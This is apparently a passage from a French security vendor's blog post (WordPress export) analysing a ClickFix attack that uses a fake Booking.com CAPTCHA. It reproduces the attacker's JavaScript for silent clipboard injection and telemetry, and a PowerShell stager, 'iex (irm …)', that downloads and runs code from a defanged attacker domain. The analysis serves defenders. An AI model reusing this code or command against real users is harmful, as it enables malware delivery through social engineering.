{"id":773972,"date":"2026-04-23T08:11:28","date_gmt":"2026-04-23T07:11:28","guid":{"rendered":"https:\/\/www.stormshield.com\/?p=773972"},"modified":"2026-04-23T08:11:28","modified_gmt":"2026-04-23T07:11:28","slug":"analyse-chaine-attaque-clickfix-part1","status":"publish","type":"post","link":"https:\/\/www.stormshield.com\/fr\/actus\/analyse-chaine-attaque-clickfix-part1\/","title":{"rendered":"Analyse d&rsquo;une cha\u00eene d&rsquo;attaque de type ClickFix (partie 1)"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n<h2>Pr\u00e9ambule<\/h2>\n<p>Dans un <a class=\"external-link\" href=\"https:\/\/www.stormshield.com\/fr\/actus\/technique-clickfix-cybermenace-en-forte-croissance\/\" target=\"_blank\" rel=\"nofollow noopener\">pr\u00e9c\u00e9dent article<\/a>, nous vous avions propos\u00e9 un aper\u00e7u global de la technique ClickFix. Une chaine d'attaque exploitant cette m\u00e9thode a \u00e9t\u00e9 d\u00e9tect\u00e9e \u00e0 la mi mars 2026 et mise en lumi\u00e8re sur\u00a0<a class=\"external-link\" href=\"https:\/\/x.com\/JAMESWT_WT\" target=\"_blank\" rel=\"nofollow noopener\">X (anciennement Twitter)<\/a>\u00a0par un\u00a0membre\u00a0<a class=\"external-link\" href=\"https:\/\/bazaar.abuse.ch\/user\/300\/\" target=\"_blank\" rel=\"nofollow noopener\">de la communaut\u00e9 MalwareBazaar<\/a>, connu pour partager r\u00e9guli\u00e8rement des \u00e9chantillons de malwares. Bien que les attaquants aient chang\u00e9 les domaines utilis\u00e9s initialement,\u00a0nous proposons de d\u00e9cortiquer ensemble la cha\u00eene d'attaque compl\u00e8te.[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n<h2>Phase d'acc\u00e8s initial<\/h2>\n<h3>App\u00e2t de la victime<\/h3>\n<p>La cha\u00eene d\u2019attaque ClickFix pr\u00e9sent\u00e9e ici d\u00e9bute\u00a0par une page web h\u00e9berg\u00e9e sur un domaine\u00a0contr\u00f4l\u00e9 par l\u2019attaquant. La victime y acc\u00e8de apr\u00e8s y avoir \u00e9t\u00e9\u202f\u00ab\u00a0incit\u00e9e\u00a0\u00bb, par exemple via un e-mail de\u00a0phishing ou une publicit\u00e9 malveillante.<\/p>\n<h3>Visuel propos\u00e9<\/h3>\n<p>Afin de\u00a0renforcer sa cr\u00e9dibilit\u00e9, elle imite l\u2019identit\u00e9\u00a0visuelle de Booking.com\u00a0et pr\u00e9sente un faux CAPTCHA (\"Je ne suis pas un robot\").\u00a0L\u2019illustration\u00a0ci-dessous pr\u00e9sente la\u00a0page web en apparence inoffensive...\u00a0En r\u00e9alit\u00e9, un code JavaScript malveillant se cache derri\u00e8re. Notez que l'URL ne correspond pas \u00e0 booking.com\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773973\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<\/p>\n<h3>Analyse du code malveillant<\/h3>\n<p>Le code JavaScript derri\u00e8re cette page n\u2019est pas obfusqu\u00e9, et reste donc enti\u00e8rement lisible. Plusieurs \u00e9l\u00e9ments ressortent de son analyse, notamment une gestion des erreurs explicite avec des m\u00e9canismes de fallback, ainsi qu\u2019une structure de code relativement propre.<\/p>\n<p>Ces caract\u00e9ristiques peuvent sugg\u00e9rer l\u2019utilisation d\u2019un kit pr\u00eat \u00e0 l\u2019emploi.<\/p>\n<p>Le fonctionnement du code JavaScript peut \u00eatre d\u00e9compos\u00e9 en cinq \u00e9tapes\u00a0:<\/p>\n<h4>Initialisation et r\u00e9cup\u00e9ration de commande malveillante<\/h4>\n<p>Au chargement de la page, le script JS lance une requ\u00eate asynchrone vers le serveur (le m\u00eame que celui qui h\u00e9berge la page).[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773980\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]La fonction <code>getCommandFromServer<\/code> d\u00e9marre ainsi\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code><strong>get_command<\/strong><\/code><\/p>\n<p><code>async function getCommandFromServer() {<br \/>\n<strong><span style=\"color: #0000ff;\">try<\/span><\/strong> {<br \/>\n<strong><span style=\"color: #0000ff;\">const<\/span><\/strong> response = await fetch('\/ern-<span style=\"color: #333399;\">ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/span>?get_command=1');<br \/>\n<strong><span style=\"color: #0000ff;\">const<\/span><\/strong> data = await response.json();<\/code><\/p>\n<p><code>[...]<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]On remarque la pr\u00e9sence d\u2019un seul param\u00e8tre pour l'URL (<code>get_command=1<\/code>). Lors de nos tests, nous avons essay\u00e9 d'injecter diff\u00e9rentes valeurs \u00e0 ce param\u00e8tre comme des nombres (0, 2\u2026), des cha\u00eenes de caract\u00e8res ainsi que des valeurs vides dans le but d'obtenir des informations suppl\u00e9mentaires. Dans tous les cas, le serveur renvoie le m\u00eame contenu. Cela montre que l\u2019impl\u00e9mentation c\u00f4t\u00e9 serveur est tr\u00e8s simple\u00a0: <code>get_command<\/code> sert surtout de d\u00e9clencheur et non \u00e0 choisir dynamiquement un payload, du moins pour l\u2019instant.<\/p>\n<p>Ci-dessous sont illustr\u00e9es la requ\u00eate et la r\u00e9ponse c\u00f4t\u00e9 navigateur au chargement de la page. On peut observer que le contenu retourn\u00e9, au format JSON, contient une commande PowerShell, ce qui est fortement suspect...[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773986\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_single_image image=\"773991\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]\u00c0 ce stade, la page est en cours de chargement et aucune action de l\u2019utilisateur n\u2019a encore \u00e9t\u00e9 effectu\u00e9e. La commande a \u00e9t\u00e9 r\u00e9cup\u00e9r\u00e9e et stock\u00e9e dans une variable globale pour \u00eatre utilis\u00e9e ult\u00e9rieurement.[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#7CBDE4\" side_padding=\"10\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<span style=\"color: #000000;\"><strong>Info<\/strong><\/span><\/p>\n<p><span style=\"color: #000000;\">Le fait de r\u00e9cup\u00e9rer la commande de mani\u00e8re dynamique permet \u00e0 l\u2019attaquant de la modifier \u00e0 tout moment sans avoir \u00e0 changer le code c\u00f4t\u00e9 client. Cela lui offre de la flexibilit\u00e9 (changement de commande \u00e0 chaud) et complique la d\u00e9tection statique. En effet, il n'existe aucune trace directe de la commande dans le DOM ou le JavaScript, ce qui limite l\u2019efficacit\u00e9 des scanners automatis\u00e9s.<\/span>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Cette commande PowerShell, ex\u00e9cut\u00e9e par la victime lors de la derni\u00e8re \u00e9tape, utilise <a href=\"https:\/\/www.stormshield.com\/fr\/actus\/fileless-malware-comment-ca-marche\/\" target=\"_blank\" rel=\"noopener\">une technique dite <em>fileless attack<\/em><\/a> pour t\u00e9l\u00e9charger un script PowerShell depuis le domaine <code>wiosyrondaty[.]com<\/code> et l'ex\u00e9cuter directement en m\u00e9moire, sans \u00e9crire de fichier sur disque. Elle combine plusieurs options pour rester discr\u00e8te et contourner les restrictions.<\/p>\n<p>Le tableau ci-dessous r\u00e9capitule chaque option\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]<div class=\"ntb_table_wrapper ninja_table_builder_instance_0\"\n     id='ninja_table_builder_773996'\n     data-ninja_table_builder_instance=\"ninja_table_builder_instance_0\"\n     style=\"\n     max-height:2000px;\n     max-width: 745px;margin-right: auto;\">\n    <table id=\"ntb_table\" role=\"table\" class=\"table ninja_tables_builder_class_773996 ntb_773996\" style=\"margin-top: 0px; margin-bottom: 0px; table-layout: fixed; border-collapse: collapse; border: 0px solid rgb(0, 0, 0); font-family: inherit; border-spacing: 0px; margin-right: auto;\"><tbody class=\"tbody\"><tr class=\"desktop-view tr_class_6451531\" id=\"tr_id_6451531\" data-draggable=\"true\" style=\"background: rgb(221, 221, 221);\" draggable=\"false\"><td id=\"td_id_80867677\" class=\"td_class_80867677 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_80867677\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_16\" spellcheck=\"false\"><strong>\u00c9l\u00e9ment<\/strong><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_73372348\" class=\"td_class_73372348 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_73372348\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_18\" spellcheck=\"false\"><strong>Signification<\/strong><\/span><\/div><\/div><\/div><\/td><td id=\"td_id_54576088\" class=\"td_class_54576088 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_54576088\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_19\" spellcheck=\"false\"><strong>R\u00f4le<\/strong><\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_6685600\" id=\"tr_id_6685600\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\" draggable=\"false\"><td id=\"td_id_15769776\" class=\"td_class_15769776 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_15769776\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_20\" spellcheck=\"false\">-C<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_64508760\" class=\"td_class_64508760 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_64508760\"><div class=\"single-item other-item\" data-draggable=\"true\" draggable=\"false\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_21\" spellcheck=\"false\">-Command<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_84825132\" class=\"td_class_84825132 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_84825132\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_22\" spellcheck=\"false\">Indique que ce qui suit est une commande \u00e0 ex\u00e9cuter directement<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_7461139\" id=\"tr_id_7461139\" data-draggable=\"true\" style=\"\"><td id=\"td_id_35414080\" class=\"td_class_35414080 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_35414080\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_23\" spellcheck=\"false\">-EP B<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_49535927\" class=\"td_class_49535927 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_49535927\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_24\" spellcheck=\"false\">-ExecutionPolicy Bypass<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_37066570\" class=\"td_class_37066570 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_37066570\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_25\" spellcheck=\"false\">Contourne la politique d\u2019ex\u00e9cution locale pour autoriser le script<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_6696087\" id=\"tr_id_6696087\" data-draggable=\"true\" style=\"background: rgb(255, 255, 255);\" draggable=\"false\"><td id=\"td_id_75490469\" class=\"td_class_75490469 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_75490469\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_26\" spellcheck=\"false\">-W H<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_77027936\" class=\"td_class_77027936 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_77027936\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_27\" spellcheck=\"false\">-WindowStyle Hidden<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_88695298\" class=\"td_class_88695298 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_88695298\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_28\" spellcheck=\"false\">Ex\u00e9cute PowerShell de fa\u00e7on discr\u00e8te, sans fen\u00eatre visible<\/span><\/div><\/div><\/div><\/td><\/tr><tr class=\"desktop-view tr_class_9956839\" id=\"tr_id_9956839\" data-draggable=\"true\" style=\"\" draggable=\"false\"><td id=\"td_id_26019884\" class=\"td_class_26019884 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_26019884\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_29\" spellcheck=\"false\">iex (irm wiosyrondaty[.]com)<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_18581374\" class=\"td_class_18581374 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_18581374\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_30\" spellcheck=\"false\"><strong>iex<\/strong> correspond \u00e0 la cmdlet <strong>Invoke\u2011Expression<\/strong>, ex\u00e9cute le texte re\u00e7u comme du code PowerShell, puis l\u2019alias <strong>irm<\/strong>, qui d\u00e9signe la cmdlet <strong>Invoke\u2011RestMethod<\/strong>, r\u00e9cup\u00e8re le contenu renvoy\u00e9 par le serveur.<\/span><\/div><\/div><\/div><\/td><td id=\"td_id_62531963\" class=\"td_class_62531963 table-data\" rowspan=\"1\" colspan=\"1\" style=\"padding: 12px; max-width: 185px; min-width: 185px; border: 1px solid rgb(0, 0, 0);\"><div id=\"cell_62531963\"><div class=\"single-item other-item\" data-draggable=\"true\"><div class=\"ntb-datas-wrapper\" style=\"margin: 1px;\"><span data-v-bd450b80=\"\" data-placeholder=\"Add New\" class=\"hover-item\" style=\"padding: 0px; font-weight: normal; font-style: normal; text-decoration: none; font-size: 12px; display: block; text-align: center; color: rgb(0, 0, 1); opacity: 1; line-height: 1.2;\" id=\"mce_31\" spellcheck=\"false\">T\u00e9l\u00e9charge et ex\u00e9cute un script en m\u00e9moire, sans \u00e9crire sur disque (stager)<\/span><\/div><\/div><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]Nous nous int\u00e9resserons plus tard au script PowerShell d\u00e9livr\u00e9.<\/p>\n<h4>Affichage s\u00e9quentiel du leurre<\/h4>\n<p>Pendant la r\u00e9cup\u00e9ration de la commande, le script utilise une succession de <code>setTimeout()<\/code> pour faire appara\u00eetre progressivement l\u2019interface du faux CAPTCHA. Cela cr\u00e9e une exp\u00e9rience r\u00e9aliste, avec des d\u00e9lais et des transitions qui incitent l\u2019utilisateur \u00e0 cliquer sur la case \u00e0 cocher. Ce code sert uniquement \u00e0 rendre l\u2019interface plus cr\u00e9dible et n\u2019a aucun caract\u00e8re malveillant.<\/p>\n<h4>Case \u00e0 cocher et copie de la commande<\/h4>\n<p>\u00c0 ce stade, la page est enti\u00e8rement charg\u00e9e. L\u2019image ci-dessous montre l\u2019apparence de la page \u00e0 cet instant\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_single_image image=\"773997\" img_size=\"large\" alignment=\"center\" css=\"\" qode_css_animation=\"\"][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_column_text css=\"\"]La case \u00e0 cocher est le d\u00e9clencheur principal : lorsqu\u2019un utilisateur clique dessus, la commande stock\u00e9e dans la variable globale est automatiquement copi\u00e9e dans le presse\u2011papiers.<\/p>\n<p>Le code JavaScript ci\u2011dessous illustre le m\u00e9canisme utilis\u00e9 pour r\u00e9aliser cette copie automatique\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code><strong>copycmd<\/strong><\/code><\/p>\n<p><code>checkbox.addEventListener(<span style=\"color: #008000;\">\"click\"<\/span>, function () {<br \/>\n<strong><span style=\"color: #0000ff;\">if<\/span><\/strong> (!command) {<br \/>\nalert('<span style=\"color: #333399;\">Command<\/span> not available');<br \/>\n<span style=\"color: #0000ff;\"><strong>return<\/strong><\/span>;<br \/>\n}<\/code><\/p>\n<p><code>console.log('<span style=\"color: #333399;\">Copying<\/span> command:', command);<\/code><\/p>\n<p><code><strong><span style=\"color: #0000ff;\">const<\/span><\/strong> textarea = document.createElement('textarea');<br \/>\ntextarea.value = command;<br \/>\ntextarea.setAttribute('readonly', '');<br \/>\ntextarea.style.position = 'absolute';<br \/>\ntextarea.style.left = '<span style=\"color: #0000ff;\">-9999px<\/span>';<br \/>\ndocument.body.appendChild(textarea);<br \/>\ntextarea.select();<\/code><\/p>\n<p><code><strong><span style=\"color: #0000ff;\">try<\/span><\/strong> {<br \/>\n<strong><span style=\"color: #0000ff;\">const<\/span><\/strong> successful = document.execCommand('copy');<br \/>\nconsole.log('<span style=\"color: #333399;\">Copy<\/span> command was ' + (successful ? 'successful' : 'unsuccessful'));<br \/>\n} <strong><span style=\"color: #0000ff;\">catch<\/span><\/strong> (err) {<br \/>\nconsole.error('<span style=\"color: #333399;\">Failed<\/span> <span style=\"color: #0000ff;\"><strong>to<\/strong> copy<\/span>: ', err);<br \/>\n}<\/code><\/p>\n<p><code>document.body.removeChild(textarea);<br \/>\nsendTelegramNotification();<\/code><\/p>\n<p><code>});<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\"][vc_column][vc_empty_space][vc_column_text css=\"\"]<\/p>\n<h4>T\u00e9l\u00e9m\u00e9trie via Telegram<\/h4>\n<p>Juste apr\u00e8s la copie de la commande dans le presse\u2011papiers, la fonction <strong>sendTelegramNotification()<\/strong> effectue imm\u00e9diatement une requ\u00eate\u202fPOST vers l\u2019URL <code>\/ern\u2011ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/code> du serveur de ClickFix (sur le m\u00eame domaine) et transmet les informations ci-dessous\u00a0:<\/p>\n<ul>\n<li>l\u2019identifiant de v\u00e9rification unique,<\/li>\n<li>le domaine courant,<\/li>\n<li>la page web d'origine (referer),<\/li>\n<li>l\u2019identification du client web (user-agent).<\/li>\n<\/ul>\n<p>Ces informations permettent \u00e0 l\u2019attaquant de suivre en temps r\u00e9el les utilisateurs ayant atteint cette \u00e9tape\u00a0: elles semblent servir de t\u00e9l\u00e9m\u00e9trie.<\/p>\n<p>Le code ci\u2011dessous illustre la fonction <code>sendTelegramNotification()<\/code> et la mani\u00e8re dont elle transmet toutes ces informations\u00a0:[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" background_image_as_pattern=\"without_pattern\" z_index=\"\" background_color=\"#F9F9F9\" side_padding=\"5\" padding_top=\"25\" padding_bottom=\"25\"][vc_column][vc_column_text css=\"\"]<code><strong>sendTelegram<\/strong><\/code><\/p>\n<p><code>function sendTelegramNotification() {<br \/>\n<strong><span style=\"color: #0000ff;\">const<\/span><\/strong> data = {<br \/>\nverification_id: window.verificationId || verificationId,<br \/>\ndomain: window.location.hostname,<br \/>\nreferer: document.referrer,<br \/>\nuser_agent: navigator.userAgent<br \/>\n};<\/code><\/p>\n<p><code>fetch('\/ern-<span style=\"color: #333399;\">ZIoCCeHgBJpt2g33q1ZHZmrC2jCoRE1hGJ5O38s<\/span>', {<br \/>\nmethod: 'POST',<br \/>\nheaders: {<br \/>\n'<span style=\"color: #333399;\">Content-Type<\/span>': 'application\/json',<br \/>\n},<br \/>\nbody: JSON.stringify(data)<br \/>\n})<br \/>\n.then(response =&gt; response.json())<br \/>\n.then(result =&gt; {<br \/>\nconsole.log('<span style=\"color: #333399;\">Telegram<\/span> notification result:', result);<br \/>\n})<br \/>\n.<strong><span style=\"color: #0000ff;\">catch<\/span><\/strong>(error =&gt; {<br \/>\nconsole.error('<span style=\"color: #333399;\">Error<\/span> sending <span style=\"color: #333399;\">Telegram<\/span> notification:', error);<br \/>\n});<br \/>\n}<\/code>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\"\" row_type=\"row\" use_row_as_full_screen_section=\"no\" type=\"full_width\" angled_section=\"no\" text_align=\"left\" 